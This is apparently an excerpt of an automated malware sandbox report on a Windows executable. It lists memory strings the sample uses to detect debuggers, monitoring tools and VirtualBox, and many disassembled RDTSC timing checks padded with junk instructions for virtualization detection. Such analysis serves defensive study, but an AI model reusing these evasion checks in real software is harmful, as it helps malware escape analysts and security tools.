Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: PROCMON.EXE
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: X64DBG.EXE
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WINDBG.EXE
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 12C23E1 second address: 12C23EE instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 12C23EE second address: 12C1C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 jbe 00007F04A523FCD0h 0x0000000f jg 00007F04A523FCCAh 0x00000015 jmp 00007F04A523FCC4h 0x0000001a push dword ptr [ebp+122D09D9h] 0x00000020 clc 0x00000021 mov dword ptr [ebp+122D1B3Fh], edi 0x00000027 call dword ptr [ebp+122D1AF1h] 0x0000002d pushad 0x0000002e jmp 00007F04A523FCC8h 0x00000033 add dword ptr [ebp+122D28E7h], edi 0x00000039 xor eax, eax 0x0000003b jns 00007F04A523FCCFh 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 stc 0x00000046 mov dword ptr [ebp+122D397Fh], eax 0x0000004c stc 0x0000004d mov esi, 0000003Ch 0x00000052 mov dword ptr [ebp+122D28E7h], esi 0x00000058 add esi, dword ptr [esp+24h] 0x0000005c clc 0x0000005d lodsw 0x0000005f or dword ptr [ebp+122D28E7h], esi 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 jmp 00007F04A523FCC7h 0x0000006e jmp 00007F04A523FCC6h 0x00000073 mov ebx, dword ptr [esp+24h] 0x00000077 sub dword ptr [ebp+122D28E7h], esi 0x0000007d nop 0x0000007e jnc 00007F04A523FCBEh 0x00000084 push eax 0x00000085 ja 00007F04A523FCC2h 0x0000008b jne 00007F04A523FCBCh 0x00000091 push eax 0x00000092 push edx 0x00000093 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144C4F7 second address: 144C50B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA90h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144B602 second address: 144B606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144B606 second address: 144B616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F04A523AA86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144B8E8 second address: 144B8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144B8ED second address: 144B8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jc 00007F04A523AA86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144BA59 second address: 144BA5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144BA5D second address: 144BA61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144BA61 second address: 144BA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F04A523FCB6h 0x0000000e jno 00007F04A523FCB6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144BBD6 second address: 144BBDB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144BBDB second address: 144BBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F04A523FCBEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144D61C second address: 12C1C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 6AF07667h 0x00000010 push dword ptr [ebp+122D09D9h] 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F04A523AA88h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov ecx, dword ptr [ebp+122D3AD7h] 0x00000036 call dword ptr [ebp+122D1AF1h] 0x0000003c pushad 0x0000003d jmp 00007F04A523AA98h 0x00000042 add dword ptr [ebp+122D28E7h], edi 0x00000048 xor eax, eax 0x0000004a jns 00007F04A523AA9Fh 0x00000050 mov edx, dword ptr [esp+28h] 0x00000054 stc 0x00000055 mov dword ptr [ebp+122D397Fh], eax 0x0000005b stc 0x0000005c mov esi, 0000003Ch 0x00000061 mov dword ptr [ebp+122D28E7h], esi 0x00000067 add esi, dword ptr [esp+24h] 0x0000006b clc 0x0000006c lodsw 0x0000006e or dword ptr [ebp+122D28E7h], esi 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 jmp 00007F04A523AA97h 0x0000007d jmp 00007F04A523AA96h 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 sub dword ptr [ebp+122D28E7h], esi 0x0000008c nop 0x0000008d jnc 00007F04A523AA8Eh 0x00000093 push eax 0x00000094 ja 00007F04A523AA92h 0x0000009a jne 00007F04A523AA8Ch 0x000000a0 push eax 0x000000a1 push edx 0x000000a2 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144D6BA second address: 144D6C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144D6C0 second address: 144D6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144D6C4 second address: 144D71B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 50508231h 0x0000000f mov dword ptr [ebp+122D1A2Eh], edi 0x00000015 or esi, dword ptr [ebp+122D27D5h] 0x0000001b push 00000003h 0x0000001d sbb di, 91C9h 0x00000022 push 00000000h 0x00000024 adc edi, 43A64958h 0x0000002a push 00000003h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F04A523FCB8h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000017h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 cld 0x00000047 push FA56A09Fh 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push esi 0x00000050 pop esi 0x00000051 pop eax 0x00000052 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144D85C second address: 144D8EF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04A523AA8Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007F04A523AA96h 0x00000012 js 00007F04A523AA9Eh 0x00000018 jmp 00007F04A523AA98h 0x0000001d popad 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 jnc 00007F04A523AA90h 0x00000028 pop eax 0x00000029 mov ecx, dword ptr [ebp+122D398Fh] 0x0000002f push 00000003h 0x00000031 mov dword ptr [ebp+122D17FDh], ebx 0x00000037 cld 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D27B9h], eax 0x00000040 push 00000003h 0x00000042 mov edi, dword ptr [ebp+122D3803h] 0x00000048 call 00007F04A523AA89h 0x0000004d jng 00007F04A523AA98h 0x00000053 push eax 0x00000054 push edx 0x00000055 jnp 00007F04A523AA86h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144D8EF second address: 144D92D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F04A523FCC7h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F04A523FCC2h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144DB06 second address: 144DB0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144DB0C second address: 144DB7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 4741948Bh 0x00000012 mov ecx, ebx 0x00000014 lea ebx, dword ptr [ebp+1245F552h] 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F04A523FCB8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 00000018h 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jmp 00007F04A523FCBDh 0x00000039 jmp 00007F04A523FCC5h 0x0000003e mov ecx, 3BA19317h 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144DB7D second address: 144DB87 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F04A523AA86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 144DB87 second address: 144DB91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F04A523FCB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 145F5C7 second address: 145F5CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146DE66 second address: 146DE6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146DE6D second address: 146DE73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 142EA59 second address: 142EA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 js 00007F04A523FCB6h 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jnc 00007F04A523FCBCh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 142EA79 second address: 142EA7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146BE21 second address: 146BE62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F04A523FCB6h 0x0000000a jmp 00007F04A523FCC2h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 pop eax 0x00000014 jmp 00007F04A523FCC1h 0x00000019 je 00007F04A523FCB6h 0x0000001f popad 0x00000020 jo 00007F04A523FCC2h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146BE62 second address: 146BE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C1A9 second address: 146C1B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F04A523FCB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C1B4 second address: 146C1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F04A523AA95h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C1DD second address: 146C1E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C663 second address: 146C669 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C669 second address: 146C66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C66F second address: 146C675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C675 second address: 146C679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C679 second address: 146C69C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA98h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C69C second address: 146C6B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F04A523FCC2h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146C6B5 second address: 146C6BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146CDCA second address: 146CDEA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F04A523FCC6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146D083 second address: 146D087 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146D087 second address: 146D08F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 146D08F second address: 146D09F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F04A523AA86h 0x0000000a jno 00007F04A523AA86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1473AAC second address: 1473AE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F04A523FCC9h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a js 00007F04A523FCB6h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1475551 second address: 1475555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1475555 second address: 147555F instructions: 0x00000000 rdtsc 0x00000002 je 00007F04A523FCB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147555F second address: 14755AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 push esi 0x00000007 jmp 00007F04A523AA97h 0x0000000c jmp 00007F04A523AA8Dh 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F04A523AA90h 0x0000001b jmp 00007F04A523AA90h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147924F second address: 147925C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1478833 second address: 147884A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F04A523AA90h 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1478DD2 second address: 1478DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147907A second address: 147909A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA96h 0x00000007 jno 00007F04A523AA86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147909A second address: 14790A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147C907 second address: 147C914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147D1BA second address: 147D1D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147DCA4 second address: 147DCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147DCA9 second address: 147DCAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147EE2A second address: 147EE9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F04A523AA91h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e sub dword ptr [ebp+124600F8h], edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push esi 0x00000019 call 00007F04A523AA88h 0x0000001e pop esi 0x0000001f mov dword ptr [esp+04h], esi 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc esi 0x0000002c push esi 0x0000002d ret 0x0000002e pop esi 0x0000002f ret 0x00000030 mov esi, ebx 0x00000032 call 00007F04A523AA8Dh 0x00000037 mov esi, dword ptr [ebp+122D1A2Eh] 0x0000003d pop esi 0x0000003e push 00000000h 0x00000040 sbb edi, 01934B66h 0x00000046 sub edi, 2BE305E2h 0x0000004c xchg eax, ebx 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 push edx 0x00000051 pop edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 147EE9A second address: 147EEB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480306 second address: 1480380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F04A523AA88h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov si, 9783h 0x0000002c push 00000000h 0x0000002e pushad 0x0000002f jnc 00007F04A523AA89h 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 push ebx 0x00000038 jng 00007F04A523AA9Eh 0x0000003e jmp 00007F04A523AA98h 0x00000043 pop ebx 0x00000044 push eax 0x00000045 js 00007F04A523AA92h 0x0000004b jl 00007F04A523AA8Ch 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480E27 second address: 1480E2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480E2C second address: 1480E36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F04A523AA86h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480E36 second address: 1480E69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jbe 00007F04A523FCB8h 0x00000011 push ecx 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 mov esi, dword ptr [ebp+122D37A3h] 0x0000001b push 00000000h 0x0000001d jc 00007F04A523FCBBh 0x00000023 xor di, 0747h 0x00000028 mov edi, 185B5255h 0x0000002d push eax 0x0000002e push ecx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480E69 second address: 1480E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1480BF2 second address: 1480BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 14860EE second address: 14860F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1486F42 second address: 1486F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 1486F49 second address: 1486F5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Eh 0x00000009 rdtsc
